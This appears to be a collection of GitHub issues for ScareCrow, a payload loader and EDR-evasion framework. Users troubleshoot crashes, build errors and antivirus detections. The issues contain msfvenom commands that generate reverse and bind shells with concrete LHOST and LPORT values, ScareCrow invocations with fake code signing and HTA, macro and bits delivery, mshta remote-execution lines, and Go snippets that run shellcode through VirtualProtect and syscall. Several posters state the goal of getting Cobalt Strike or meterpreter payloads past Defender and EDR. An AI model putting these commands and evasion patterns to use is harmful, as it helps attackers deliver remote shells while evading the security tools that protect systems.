scarecrow's Issues

Mythic Atlas Agent/Mythic

After creating shellcode in Mythic using the Atlas agent, I try to generate a wrapper for it using the ScareCrow wrapper and get this:
No payloads that can be included have been created yet.
What am I doing wrong?

Missing some go modules apparently

I followed the installation instructions and am running into issues where it thinks I am missing things. See below. Any advice?

[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
panic: open Word/Word.go: no such file or directory

[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
panic: open lync/lync.go: no such file or directory

[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
panic: open Outlook/Outlook.go: no such file or directory

Exception during code execution

Exception raised during execution of shellcode, shellcode was tested via different execution means and worked as expected.

Exception with resulting binary

When I create a binary (on kali):

./ScareCrow -I shellcode_x64.bin -Loader binary -domain google.com

and execute the binary on windows, I receive an exception:

[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [*] Create a Pointer on stack
[DEBUG] [*] Loading shellcode into a string
[DEBUG] [*] Copy Pointer's attributes
[DEBUG] [*] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x0 0x1724fbb3000 0xc000090000
PC=0xc000090000

syscall.Syscall(0xc000090000, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)
runtime/syscall_windows.go:188 +0xe9
main.main()
loader/OneDrive.go:202 +0x665
rax 0xc000090000
rbx 0xcdf920
rcx 0x0
rdi 0xb24fb23000
rsi 0xc000079e40
rbp 0xc000079de0
rsp 0xb24fdffd18
r8 0x0
r9 0x0
r10 0x0
r11 0x206
r12 0xffffffffffffffff
r13 0x2e
r14 0x2d
r15 0xaa
rip 0xc000090000
rflags 0x10297
cs 0x33
fs 0x53
gs 0x2b

How to create valid payloads?

I would like to thank you first for providing such a complete framework and the research details!

Unfortunately, I was not able to create valid payloads with ScareCrow so far.
As an example, I tried the shellcode creation via msfvenom first:

msfvenom -p windows/x64/shell/bind_tcp LPORT=8888 -f raw -o ./Desktop/scarecrow-test/bind.bin -b '\x00'

or

msfvenom -p windows/x64/shell/bind_tcp LPORT=8888 EXITFUNC=thread -f raw -o ./Desktop/scarecrow-test/bind.bin -b '\x00'

Then I tried to use ScareCrow on it:

./ScareCrow -I ../bind.bin -Loader binary -domain microsoft.com -console

which succeeds in creating a binary loader. But the resulting exe is not working on a Windows box. The resulting debug output in the console is:

[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [*] Create a Pointer on stack
[DEBUG] [*] Loading shellcode into a string
[DEBUG] [*] Copy Pointer's attributes
[DEBUG] [*] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x0 0xda29d2b000 0xc000128000
PC=0xc000128000

runtime: unknown pc 0xc000128000
stack: frame={sp:0xc000119e30, fp:0x0} stack=[0xc000112000,0xc00011a000)
000000c000119d30:  0000000000000001  000000c000119d60
000000c000119d40:  000000000066bb98 <fmt.(*pp).free+184>  0100000000777000
000000c000119d50:  000001e7e9b993b0  0000000000000000
000000c000119d60:  0000000000000028  000001e7e9b907b0
000000c000119d70:  000000c00000aae0  000000c000082120
000000c000119d80:  000000000077f660  0000000000000000
000000c000119d90:  0000000000000000  00000000006e5280
000000c000119da0:  ffffffffffffffff  000000c000094500
000000c000119db0:  000000c000119ed8  0000000000000040
000000c000119dc0:  000000c000119e90  000000000069f180
000000c000119dd0:  000000000068e401 <main.printDebug+33>  000000c00000aae0
000000c000119de0:  0000000000000050  000000000068f7ce <main.NtProtectVirtualMemory+142>
000000c000119df0:  0000000000690050  000000c00000aae0
000000c000119e00:  0000000000000005  0000000000000005
000000c000119e10:  0000000000000000  0000000000000000
000000c000119e20:  000000c0000fcde0  000000c000119f78
000000c000119e30: <000000000068f2d9 <main.main+1593>  00000000006c0050
000000c000119e40:  ffffffffffffffff  000000c000094500
000000c000119e50:  000000c000119ed8  0000000000000040
000000c000119e60:  000000c000119e90  0000000000000000
000000c000119e70:  0000000000000000  000000c0000fcde0
000000c000119e80:  0000000000000002  0000000000000400
000000c000119e90:  0000000000000004  0000000000000540
000000c000119ea0:  0000000000000010  0000000000000012
000000c000119eb0:  0000000000000540  00000000000003e6
000000c000119ec0:  00000000006e5c20  0000000000000020
000000c000119ed0:  0000000000000021  0000000000002000
000000c000119ee0:  000000c0000fc990  000000c0000c5f18
000000c000119ef0:  000000000068e2ee <golang.org/x/sys/windows/registry.init+686>  000000c0000fc810
000000c000119f00:  00000000006c2647  0000000000000019
000000c000119f10:  000000c0000fc990  000000c0000c5f48
000000c000119f20:  000000c000094500  000000c000128800
runtime: unknown pc 0xc000128000
stack: frame={sp:0xc000119e30, fp:0x0} stack=[0xc000112000,0xc00011a000)
000000c000119d30:  0000000000000001  000000c000119d60
000000c000119d40:  000000000066bb98 <fmt.(*pp).free+184>  0100000000777000
000000c000119d50:  000001e7e9b993b0  0000000000000000
000000c000119d60:  0000000000000028  000001e7e9b907b0
000000c000119d70:  000000c00000aae0  000000c000082120
000000c000119d80:  000000000077f660  0000000000000000
000000c000119d90:  0000000000000000  00000000006e5280
000000c000119da0:  ffffffffffffffff  000000c000094500
000000c000119db0:  000000c000119ed8  0000000000000040
000000c000119dc0:  000000c000119e90  000000000069f180
000000c000119dd0:  000000000068e401 <main.printDebug+33>  000000c00000aae0
000000c000119de0:  0000000000000050  000000000068f7ce <main.NtProtectVirtualMemory+142>
000000c000119df0:  0000000000690050  000000c00000aae0
000000c000119e00:  0000000000000005  0000000000000005
000000c000119e10:  0000000000000000  0000000000000000
000000c000119e20:  000000c0000fcde0  000000c000119f78
000000c000119e30: <000000000068f2d9 <main.main+1593>  00000000006c0050
000000c000119e40:  ffffffffffffffff  000000c000094500
000000c000119e50:  000000c000119ed8  0000000000000040
000000c000119e60:  000000c000119e90  0000000000000000
000000c000119e70:  0000000000000000  000000c0000fcde0
000000c000119e80:  0000000000000002  0000000000000400
000000c000119e90:  0000000000000004  0000000000000540
000000c000119ea0:  0000000000000010  0000000000000012
000000c000119eb0:  0000000000000540  00000000000003e6
000000c000119ec0:  00000000006e5c20  0000000000000020
000000c000119ed0:  0000000000000021  0000000000002000
000000c000119ee0:  000000c0000fc990  000000c0000c5f18
000000c000119ef0:  000000000068e2ee <golang.org/x/sys/windows/registry.init+686>  000000c0000fc810
000000c000119f00:  00000000006c2647  0000000000000019
000000c000119f10:  000000c0000fc990  000000c0000c5f48
000000c000119f20:  000000c000094500  000000c000128800
rax     0xc000128000
rbx     0x0
rcx     0xc0000fcde0
rdi     0x1a29c03000
rsi     0xc000119da0
rbp     0xc000119f78
rsp     0xc000119e30
r8      0xc000119d98
r9      0xc000119e28
r10     0x0
r11     0x212
r12     0xffffffffffffffff
r13     0x3b
r14     0x3a
r15     0xaa
rip     0xc000128000
rflags  0x10246
cs      0x33
fs      0x53
gs      0x2b

I also tried to use Donut to create an x64 shellcode of an existing binary, as well as using dll as a Loader for ScareCrow for both generated shellcodes (msf and donut). Nothing has worked so far for me.

Can you please give me more details on what kind of shellcode payload ScareCrow expects?
Maybe provide some examples in the documentation?

Many thanks

Feature Request: Output parameter

Hey man great work!

I would like to ask for a feature request when you find time and you want it as well :)

Feature: To add an output parameter that specifies the location of the final Payload/Loader on where it is going to be saved.

For example:
./ScareCrow ...... --output /home/user/Desktop/
(The user wants the final payload to be saved at the Desktop)

Thanks in advance,
Keep up the great work!

No bypass

Encrypted shellcode method does not bypass antiviruses.

HTA delivery failing with remote URL

When executing the HTA delivery file (for both control and excel loaders) passing a remote URL where the HTA file is hosted does nothing. On the other hand, if the HTA file is already located on disk, the shellcode is executed successfully.

Monitoring through Process Explorer for control, you can see that control.exe is spawned which then calls rundll32.exe. This never happens when a remote URL is passed instead.

HTA file generated via:
/opt/ScareCrow/ScareCrow -I raw_shell.bin -Loader control -O loader.hta -delivery hta -url <url> -domain <domain>
OR
/opt/ScareCrow/ScareCrow -I raw_shell.bin -Loader excel -O loader.hta -delivery hta -url <url> -domain <domain>

Control/Excel Loader executed via:
mshta.exe http://HOST/loader.hta --> does not work
mshta.exe C:\Windows\Tasks\loader.hta --> works

hta delivery one liner - no output

Hello,

If I choose the delivery option (hta), the executable is generated, but the hta file and the one-liner command (output?) are missing.

What have I missed?

Thanks!

Code signing certificate generation fails

Whenever I try to generate a binary it fails. I peeked at the code and saw that it fails at the point where the certificate is generated. I have tried it on an up-to-date Kali Linux and on a Debian 9 server.

The payload is generated with:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.197 LPORT=51251 -f raw > bin.raw

Tried multiple argument permutations.

Error:

└─$ /opt/ScareCrow/ScareCrow -I /home/kali/Desktop/bin.raw -domain axano.com  -Loader binary -delivery macro -url http://192.168.0.197/
 
  _________                           _________                       
 /   _____/ ____ _____ _______   ____ \_   ___ \_______  ______  _  __
 \_____  \_/ ___\\__  \\_  __ \_/ __ \/    \  \/\_  __ \/  _ \ \/ \/ /
 /        \  \___ / __ \|  | \/\  ___/\     \____|  | \(  <_> )     / 
/_______  /\___  >____  /__|    \___  >\______  /|__|   \____/ \/\_/  
        \/     \/     \/            \/        \/                      
                                                        (@Tyl0us)
        “Fear, you must understand is more than a mere obstacle. 
        Fear is a TEACHER. the first one you ever had.”

[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With cmd's Properties
[*] Compiling Payload
[+] Payload Compiled
[*] Signing cmd.exe With a Fake Cert
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x6df56a]

goroutine 1 [running]:
ScareCrow/limelighter.GenerateCert(0x7ffe784ad450, 0x9)
        /opt/ScareCrow/limelighter/limelighter.go:56 +0x2ca
ScareCrow/limelighter.Signer(0x7ffe784ad450, 0x9, 0x0, 0x0, 0x0, 0x0, 0xc000448720, 0x7)
        /opt/ScareCrow/limelighter/limelighter.go:1040 +0x4c6
main.execute(0xc0000fa000, 0x76f099, 0x3)
        /opt/ScareCrow/ScareCrow.go:83 +0x63b
main.main()
        /opt/ScareCrow/ScareCrow.go:162 +0x906

FIXED

Hi, thanks for this awesome tool!

fixed thanks.

Binary loader

Hi,

I generated shellcode for a message box and used the binary loader to convert it to an exe with ScareCrow.
It was generated successfully, but it does not prompt with the message box. It seems there is an issue with the binary loader.

Windows 10 bug

exec: "": executable file not found in %PATH%:
[+] Payload Compiled
[*] Signing mimosys.dll With a Fake Cert
2022/04/15 12:46:03 cmd.Run() failed with exit status 0xffffffff

I have downloaded osslsigncode and put it on the PATH env to sign, and it still gives this error.

It does not work on Windows 10.

Binary and dll payloads not working

Binary and dll payloads are not working with Covenant (that uses donut to generate shellcode).

The control .cpl payload works but it is flagged by 6 AVs. I was modifying the code base for ages trying to find the signatures, but it's a large code base.

Any ideas which bits of the code they are flagging? I noticed that random names are generated for every function and variable name in the Cryptor.

I tried running the dll payload with: rundll32 example.dll

DLL Refresher detection

Hello,

thank you for providing such a great framework! Amazing work.

Unfortunately, the DLL Refresher code is detected by some AV, for example: NOD32. Example command:

../ScareCrow/ScareCrow -I beacon-sourcepoint-test1.bin -Loader dll -etw -domain www.microsoft.com

When I disabled refreshing and ETW, the DLL bypasses NOD32 though. I tried modifying the Struct.go, but editing is pretty hard due to "variable set and unused" compilation error.

Any chance that you can implement the ETW and Refresher functionality as reflected (encrypted) DLL files? My Golang skills cannot do that in this language :(

thanks
Rafal

Excel loader not working

Hi again,

as I played around with this great tool a little more, I found I could not get the Excel loader module to work.
I tried to create shellcode in two ways:

msfvenom -p windows/x64/shell_bind_tcp LPORT=8888 -o msf.bin -f raw

msfvenom -p windows/x64/meterpreter_bind_tcp LPORT=8888 -o msf.bin -f raw

Both worked flawlessly with other loaders (except the binary one).

When I create the payload via Excel loader module, I try to execute it via cscript as I saw a JavaScript file gets created.
Excel spawns with an unsafe file extension message but does not execute the resulting xll.

I saw the xll got created in AppData\temp so I copied it before closing Excel and tried to execute the DLL manually by the methods described in this gist:

https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52

Unfortunately none of them worked.

Windows version here is

Version 20H2 (OS Build 19042.746)

Excel version is:

Office Professional Plus 2019
Version 2102

No AVs are installed and Defender is turned off completely for testing here.

When attempting to use CS beacon64.bin as input for HTA output only JSfile() output is in file

Input:
./ScareCrow -I /root/tools/b64.bin -Loader wscript -O loader.hta -domain microsoft.com

  • b64.bin is default CobaltStrike RAW output bin file.

Output: [screenshot attachment]

Thoughts:
Tested 3 times. File output only appears to show code from Structs.go JSfile() the code from HTA() does not appear in file. I could be using it wrong or something but I think the expected output would be using some of the HTA() code (at least for the html). Might help solve issue #19.

Interesting output found during testing (file extension left blank): [screenshot attachment]

Binary Mode Crashing on later versions of Go

C:\Users\Admin\Desktop>test.exe
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [*] Create a Pointer on stack
[DEBUG] [*] Loading shellcode into a string
[DEBUG] [*] Copy Pointer's attributes
[DEBUG] [*] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x0 0xffffffffffffffff 0x7ffcdc61d34d
PC=0x7ffcdc61d34d

runtime: unknown pc 0x7ffcdc61d34d
stack: frame={sp:0xc00006d2a8, fp:0x0} stack=[0xc00006c000,0xc00006e000)
000000c00006d1a8: 0000000000000200 0000000000000008
000000c00006d1b8: 0000000000000000 0000000000000110
000000c00006d1c8: 0000000000000100 0000000000000002
000000c00006d1d8: 0000000000a30000 000000c00006d2a1
000000c00006d1e8: 0000000000000011 00007ffcef6fb434
000000c00006d1f8: 0000000000140000 0000000000000000
000000c00006d208: 00007ffcdc687420 0000000000000002
000000c00006d218: 0000000000000001 0000000000a3e4d0
000000c00006d228: 0000000000000002 00007ffcef6cabec
000000c00006d238: 000000c000000000 0000000000000000
000000c00006d248: 0000000000000000 0000000000a3e490
000000c00006d258: 000000c00006d300 00007ffcef6caa97
000000c00006d268: 0000000000a3e490 00007ffcef713c70
000000c00006d278: 0000000000a3e490 0000001700000002
000000c00006d288: 000000000000018c 00007ffcdc687420
000000c00006d298: 000000a000000000 0000000000000000
000000c00006d2a8: <0000af6126a8b566 0000000000000000
000000c00006d2b8: 0000000000000000 00007ffcec65eced
000000c00006d2c8: 00000000000003f0 0000000000000000
000000c00006d2d8: 00007ffcdc687420 00007ffcef826448
000000c00006d2e8: 0000000000000000 00007ffcec65ec4b
000000c00006d2f8: 0000000000a3e490 0000af6126a8b576
000000c00006d308: 00007ffcdc687420 00007ffcdc5d7c01
000000c00006d318: 0000000000000190 000000000000001d
000000c00006d328: 000000c00006d360 0000000000000004
000000c00006d338: 000000c00006d368 0000000000000000
000000c00006d348: 000000c00006d3d8 00007ffcdc5adbd0
000000c00006d358: 0000000000000000 0000000000000000
000000c00006d368: 0000000000000000 00000000ef6ca3bf
000000c00006d378: 0000000000000000 0000000000000000
000000c00006d388: 000000c00006d3e1 00007ffcdc6118c1
000000c00006d398: 0000000000000000 0000000000000190
runtime: unknown pc 0x7ffcdc61d34d
stack: frame={sp:0xc00006d2a8, fp:0x0} stack=[0xc00006c000,0xc00006e000)
000000c00006d1a8: 0000000000000200 0000000000000008
000000c00006d1b8: 0000000000000000 0000000000000110
000000c00006d1c8: 0000000000000100 0000000000000002
000000c00006d1d8: 0000000000a30000 000000c00006d2a1
000000c00006d1e8: 0000000000000011 00007ffcef6fb434
000000c00006d1f8: 0000000000140000 0000000000000000
000000c00006d208: 00007ffcdc687420 0000000000000002
000000c00006d218: 0000000000000001 0000000000a3e4d0
000000c00006d228: 0000000000000002 00007ffcef6cabec
000000c00006d238: 000000c000000000 0000000000000000
000000c00006d248: 0000000000000000 0000000000a3e490
000000c00006d258: 000000c00006d300 00007ffcef6caa97
000000c00006d268: 0000000000a3e490 00007ffcef713c70
000000c00006d278: 0000000000a3e490 0000001700000002
000000c00006d288: 000000000000018c 00007ffcdc687420
000000c00006d298: 000000a000000000 0000000000000000
000000c00006d2a8: <0000af6126a8b566 0000000000000000
000000c00006d2b8: 0000000000000000 00007ffcec65eced
000000c00006d2c8: 00000000000003f0 0000000000000000
000000c00006d2d8: 00007ffcdc687420 00007ffcef826448
000000c00006d2e8: 0000000000000000 00007ffcec65ec4b
000000c00006d2f8: 0000000000a3e490 0000af6126a8b576
000000c00006d308: 00007ffcdc687420 00007ffcdc5d7c01
000000c00006d318: 0000000000000190 000000000000001d
000000c00006d328: 000000c00006d360 0000000000000004
000000c00006d338: 000000c00006d368 0000000000000000
000000c00006d348: 000000c00006d3d8 00007ffcdc5adbd0
000000c00006d358: 0000000000000000 0000000000000000
000000c00006d368: 0000000000000000 00000000ef6ca3bf
000000c00006d378: 0000000000000000 0000000000000000
000000c00006d388: 000000c00006d3e1 00007ffcdc6118c1
000000c00006d398: 0000000000000000 0000000000000190
rax 0x7ffcdca04800
rbx 0x0
rcx 0x190
rdi 0xc00006d398
rsi 0x0
rbp 0xc00006d388
rsp 0xc00006d2a8
r8 0xc00006d360
r9 0x4
r10 0x0
r11 0x246
r12 0x7ffcdc9bb558
r13 0x1
r14 0x1
r15 0x0
rip 0x7ffcdc61d34d
rflags 0x10212
cs 0x33
fs 0x53
gs 0x2b

options not working

Hi,

Is it possible that the different Loaders and Delivery options don't work? I installed the dependencies and everything on Kali Linux and generated raw shellcode with msfvenom. The process of building a binary or dll finishes without errors, but they never execute the payload. I'm using a Windows x64 reverse shell generated with this command:

msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows -f raw -o shellcode.bin LHOST=192.168.0.49 LPORT=443

the command executed to build the binary is:

./ScareCrow -I /root/Desktop/tests/payloads/shellcode.bin -delivery bits -domain www.microsoft.com

The delivery options do not generate the code to download and execute the payload, like the macros one.
The only option that actually worked and executed the reverse shell was the Control Panel applet. Nothing else works.

Also, when I examine the Digital Signature of the generated binary or dll or applet it says that it cannot be verified, unlike the screenshot you provided in the Readme file.

My go version is 1.15.3

Any ideas as to what might be wrong? Do I need to start from zero?

Thank you!

Error during payload compiling and after that during signing of a binary

Hi. Thank you for your great work! I am trying to get a Cobalt Strike beacon.exe through Windows Defender, but currently I get the two errors below. I attempt this on Kali 2021.3 in a virtual environment using version 2.3 of ScareCrow.

┌──(virtual_env_scarecrow)─(root💀kali)-[~/pentest/ScareCrow-2.3]
└─# ./ScareCrow -I beacon.exe -domain www.microsoft.com -injection "C:\Windows\System32\notepad.exe" -console

[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[+] Process Injection Mode Enabled
[*] Created Process: C:\Windows\System32\notepad.exe
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With OneDrive's Properties
[*] Compiling Payload
exit status 2: # loader
./OneDrive.go:367:67: newline in string
./OneDrive.go:367:67: syntax error: unexpected newline, expecting comma or )
./OneDrive.go:2682:3: newline in string

[+] Payload Compiled
[*] Signing OneDrive.exe With a Fake Cert
2021/09/22 04:06:42 cmd.Run() failed with exit status 255

Macro delivery

For some reason the macro fails! After generating the loader and js file from msfvenom.bin shellcode:
./ScareCrow -I msfvenom.bin -Loader excel
-domain some.tld -url http://some.com -sandbox -O file.js
I host the file on the server provided in the payload and copy the macro from ScareCrow, adding it to an Office 2013
Developer macro. (The shellcode itself works: when I execute cscript file.js I get shell access.)
From Process Hacker I can actually see Excel contact the server URL I provided, but no reverse shell is created! Tried with the excel, msiexec and wscript Loaders, so I am assuming that I have made a mistake somewhere!

Detected by AV

Payload is detected by defender as malicious and deleted

Windows defender catches ScareCrow generated payload

I created stageless meterpreter with msfvenom, then packed it as exe file with scarecrow, and windows defender is catching my exe file. Am I doing something wrong, or is ScareCrow already out of date?

Kind regards, Zahar

Newb payload generation/evasion question

Hello!

I'm finding that Windows Defender is gobbling each and every payload I throw from ScareCrow at it, and it feels like I'm doing something wrong. Hope you could sanity check my process? Fair warning: I'm not new to pentesting but new to Cobalt Strike and not very experienced with EDR bypass techniques. In fact, seeing this video on ScareCrow is what inspired me to finally buy Cobalt Strike!

Anyways, I start in Cobalt Strike:

  1. Attacks > Packages > Payload Generator > picked my listener > chose output of "raw" > ticked the box for "Use x64 payload" > saved that to ScareCrow folder on Kali VM. I also tried Attacks > Packages > Windows Executable (S) to get the export as well.

  2. From Kali VM, tried generating a variety of payloads from Scarecrow. They generate successfully with no errors.

  3. From my Win 10 19041 box, tried firing the payloads in several ways (drag and drop directly to disk, fire with msbuild, fire with PowerShell, fire with rundll32, etc.) and Windows Defender happily gobbles them up.

I thought maybe it was just Defender getting wise to some of ScareCrow's shenanigans, but it looks like folks have no problem fooling Defender - at least as of this very recent blog post that I saw someone tweet.

Any ideas?

Thanks!
Brian

windows ec2

Hello all, when I use the SSM Run Command I get the result as failed with this screen.

Failed to run command : exit status 0xffffffff

Scarecrow not working with Mythic C2/atlas agent

Hello,
During testing of C2 frameworks and scarecrow I ran across interesting behavior when it came to the Mythic C2 atlas agent (https://github.com/MythicAgents/atlas)

When exporting an atlas agent executable, using donut to generate shellcode and then using scarecrow the new wrapped payload is successfully created. When executed this payload makes 1 callback to the C2 server and then ceases to run. I have tried a number of different combinations to attempt to understand the issue better:

atlas + confuserEx + donut + scarecrow = 1 callback then dead
atlas + donut + scarecrow = 1 callback then dead
atlas + CLRvoyance + scarecrow = 1 callback then dead
atlas + confuserEx + donut + DonutTest = working implant

in addition I tried another dotnet c2 framework
Covenant Grunt + confuserEx + donut + scarecrow = working implant.

I have tried the binary and control loaders and I have used the console, and no errors are generated at any point. I'm happy to try any other troubleshooting that anyone might recommend.

Thanks

EDR Bypass

Hello :)

Which EDR were you able to bypass?

Best,
L

Cannot Generate Payload expected 'STRING', found '<<'

Thank you for the code and latest update, however, I could not generate exe on latest 4.0.

Raw payload generated by the latest CS

sudo ./ScareCrow -I ~/Downloads/beacon.bin -Loader control -domain www.microsoft.com -O test.exe

gives me the following error message:

[*] Compiling Payload
exit status 1: go list error: exit status 1: inputs.go:8:1: expected 'STRING', found '<<'


[+] Payload Compiled

Each time I run the command it reports a different file name, but the same location, for example:

exit status 1: go list error: exit status 1: winsec.go:8:1: expected 'STRING', found '<<'
exit status 1: go list error: exit status 1: netfirewall.go:8:1: expected 'STRING', found '<<'

Thanks!!

exec: "": executable file not found in %PATH%:

Hello, running this tool on a Windows 10 box, with all the required tools installed and set up on the system PATH variable, I get this error:

ccc is the raw generated payload with msfvenom

C:\temp\ScareCrow>ScareCrow.exe -I c:\temp\ccc -domain microsoft.com


  _________                           _________                       
 /   _____/ ____ _____ _______   ____ \_   ___ \_______  ______  _  __
 \_____  \_/ ___\\__  \\_  __ \_/ __ \/    \  \/\_  __ \/  _ \ \/ \/ /
 /        \  \___ / __ \|  | \/\  ___/\     \____|  | \(  <_> )     / 
/_______  /\___  >____  /__|    \___  >\______  /|__|   \____/ \/\_/  
        \/     \/     \/            \/        \/                      
                                                        (@Tyl0us)
        “Fear, you must understand is more than a mere obstacle. 
        Fear is a TEACHER. the first one you ever had.”

[*] Encrypting Shellcode Using AES Encryption
[+] Shellcode Encrypted
[*] Creating an Embedded Resource File
[+] Created Embedded Resource File With Outlook's Properties
[*] Compiling Payload
exec: "": executable file not found in %PATH%:
[+] Payload Compiled
[*] Signing Outlook.exe With a Fake Cert
2021/02/15 16:29:44 cmd.Run() failed with exit status 4294967295

I cannot figure out which executable is not on the PATH. Is there anything I am doing wrong? Every single tool works and is on the PATH.

thanks

Invalid PKCS7 Data (Empty or Not Padded)

OS is Kali Linux 2021.2. Go version is go version go1.15.15 linux/amd64.

I'm using a Cobalt Strike payload generated using Attacks -> Packages -> Windows Executable (S), Raw, and checked x64.

I enter the command:

./ScareCrow -I payload.bin -Loader wscript -etw --url http://[redacted] -domain support.microsoft.com -delivery bits

I get the error:

2021/09/23 11:10:01 [-] Invalid PKCS7 Data (Empty or Not Padded)

I've tried different options and different domains and always get the same error. I also tried git pull origin main and ran through the documented installation steps and still get the same error.

Thanks

Previous declaration when using any other loader

Unable to find a resolution for this one. Any time I attempt to run using anything other than the default, I am presented with an error from Go, I believe, relating to a previous declaration:

[*] Compiling Payload
exit status 1: go list error: exit status 2: # igYzBjFwiyh
./tcpmon.go:10:3: base64 redeclared as imported package name
/home/user/tools/ScareCrow/tcpmon/tcpmon.go:8:3: previous declaration

I didn't see this anywhere else, could it be a golang issue with the new version or something related to my current setup?

Thanks! And thank you for your work, it's fantastic.

cmd.Run() failed with exit status 0xffffffff

After the step "[*] Signing Outlook.exe With a Fake Cert", I get cmd.Run() failed with exit status 0xffffffff.
My environment:
go version go1.17.1 windows/amd64

OpenSSL 3.0.0 7 sep 2021 (Library: OpenSSL 3.0.0 7 sep 2021)

osslsigncode 2.2, using:
OpenSSL 1.1.1k 25 Mar 2021 (Library: OpenSSL 1.1.1k 25 Mar 2021)
libcurl/7.78.0 OpenSSL/1.1.1k zlib/1.2.11

some question about the shellcode loader

Hi, there is some code I can't understand in this shellcode loader.
ScareCrow executes shellcode this way:

targetPtr := func(){
}
size := uintptr(len(shellcode))
var old uint32
windows.VirtualProtect(uintptr(unsafe.Pointer(&targetPtr)), size, windows.PAGE_EXECUTE_READWRITE, &old)

*(**uintptr)(unsafe.Pointer(&targetPtr)) = (*uintptr)(unsafe.Pointer(&shellcode))

var old1 uint32
windows.VirtualProtect(uintptr(unsafe.Pointer(&shellcode[0])), size, windows.PAGE_EXECUTE_READWRITE, &old1)

syscall.Syscall(uintptr(unsafe.Pointer(&shellcode[0])), 0, 0, 0, 0)

but I tried another way that works too and needs less code:

size := uintptr(len(shellcode))

var old uint32

windows.VirtualProtect(uintptr(unsafe.Pointer(&shellcode[0])), size, windows.PAGE_EXECUTE_READWRITE, &old)

syscall.Syscall(uintptr(unsafe.Pointer(&shellcode[0])), 0, 0, 0, 0)

and another way that works but is unreliable:

targetPtr := func(){
}
size := uintptr(len(shellcode))
var old uint32
windows.VirtualProtect(uintptr(unsafe.Pointer(&targetPtr)), size, windows.PAGE_EXECUTE_READWRITE, &old)

*(**uintptr)(unsafe.Pointer(&targetPtr)) = (*uintptr)(unsafe.Pointer(&shellcode))

var old1 uint32
windows.VirtualProtect(uintptr(unsafe.Pointer(&shellcode[0])), size, windows.PAGE_EXECUTE_READWRITE, &old1)

targetPtr()

runtime error when compiling payloads

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x18 pc=0x6b7193]

goroutine 1 [running]:
ScareCrow/limelighter.GenerateCert(0x7ffee0ffe6d3, 0x8)
	/home/jean/Documents/Tools/ScareCrow/limelighter/limelighter.go:49 +0x133
ScareCrow/limelighter.Signer(0x7ffee0ffe6d3, 0x8, 0x0, 0x0, 0x0, 0x0, 0xc000309100, 0x8)
	/home/jean/Documents/Tools/ScareCrow/limelighter/limelighter.go:1015 +0x5de
main.execute(0xc000012120, 0x73f3a9, 0x4)
	/home/jean/Documents/Tools/ScareCrow/ScareCrow.go:83 +0x63b
main.main()
	/home/jean/Documents/Tools/ScareCrow/ScareCrow.go:162 +0x90c
                                                                                           

Binary crashes after overwriting pointer

The first error seems to be an access denied (0xc0000005)

./ScareCrow -I ~/Desktop/Payloads/payload.bin -console -domain www.microsoft.com

Example one

OneDrive.exe
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [*] Create a Pointer on stack
[DEBUG] [*] Loading shellcode into a string
[DEBUG] [*] Copy Pointer's attributes
[DEBUG] [*] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x0 0x1af93eea000 0xc00009c000
PC=0xc00009c000

syscall.Syscall(0xc00009c000, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)
runtime/syscall_windows.go:188 +0xe9
main.main()
loader/OneDrive.go:202 +0x665
rax 0xc00009c000
rbx 0x10b0920
rcx 0x0
rdi 0xef93e4e000
rsi 0xc00010fe40
rbp 0xc00010fde0
rsp 0xef941ffb88
r8 0x0
r9 0x0
r10 0x0
r11 0x206
r12 0xffffffffffffffff
r13 0x3e
r14 0x3d
r15 0xaa
rip 0xc00009c000
rflags 0x10297
cs 0x33
fs 0x53
gs 0x2b

Example two - ran as administrator to see if the problem went away

cmd
[DEBUG] [+] Detected Version: 10.0
[DEBUG] [+] Reloading: C:\Windows\System32\kernel32.dll
[DEBUG] [+] Reloading: C:\Windows\System32\kernelbase.dll
[DEBUG] [+] Reloading: C:\Windows\System32\ntdll.dll
[DEBUG] [+] EDR removed
[DEBUG] [*] Create a Pointer on stack
[DEBUG] [*] Loading shellcode into a string
[DEBUG] [*] Copy Pointer's attributes
[DEBUG] [*] Overwriten Pointer to point to shellcode String
Exception 0xc0000005 0x0 0x196c2d26000 0xc000068000
PC=0xc000068000

syscall.Syscall(0xc000068000, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)
runtime/syscall_windows.go:188 +0xe9
main.main()
loader/cmd.go:202 +0x658
rax 0xc000068000
rbx 0xf40920
rcx 0x0
rdi 0xd6c2cbe000
rsi 0xc0000c9e40
